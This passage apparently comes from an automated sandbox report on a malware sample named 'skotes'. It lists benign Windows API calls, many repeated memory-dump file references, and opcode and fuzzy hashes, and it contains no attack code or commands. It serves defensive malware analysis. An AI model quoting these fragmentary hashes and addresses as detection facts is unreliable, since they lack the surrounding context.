                                                                                                                                                                                                                                              • Sleep.KERNEL32(00007530), ref: 00BE6D25
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateSleepThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4202482776-0
                                                                                                                                                                                                                                              • Opcode ID: 73caf05e90f0f21f8cd9f6e5d7fa6b4ac7df9edf7d17c9afa1d4d673ba0c3388
                                                                                                                                                                                                                                              • Instruction ID: f828552a3d4bca88ca8bc3144d38b600a5434c598a32cfa3a912a8d0387ed752
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73caf05e90f0f21f8cd9f6e5d7fa6b4ac7df9edf7d17c9afa1d4d673ba0c3388
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29D012707D0318B6F12002222C0BF2AAA509B0AF81FB5588077083E0E086E0340046A8
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00BDD913
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileModuleName
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 514040917-0
                                                                                                                                                                                                                                              • Opcode ID: abb99415f24e2751e6cb75a525e71b938bb0aa289e02aa573c6fbc35e08d6e53
                                                                                                                                                                                                                                              • Instruction ID: b80f7b0bc94669b845e31fb64b69e0a7dfa24aa62d53a49014bbc55752afc283
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abb99415f24e2751e6cb75a525e71b938bb0aa289e02aa573c6fbc35e08d6e53
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5D122319002589BEB25EB28CC89BDDFBB1AF45304F5441D9E489A7382EB755FC8CB91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD8524
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1721193555-0
                                                                                                                                                                                                                                              • Opcode ID: 83624aa3e63431f63e540f82579f9ebd4d5c9ca79a1e599b4b2bf18adb11316d
                                                                                                                                                                                                                                              • Instruction ID: 501ce70c657a99fb0584bf30d4c14578d79240f614c3842a65b55621605a20ca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83624aa3e63431f63e540f82579f9ebd4d5c9ca79a1e599b4b2bf18adb11316d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99512771D102489BDB28EB28DD49BDDFBB5DB45315F5042E9E418A73C1EF309E808B91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00C0705B,?,?,00000000,00000000), ref: 00C07166
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
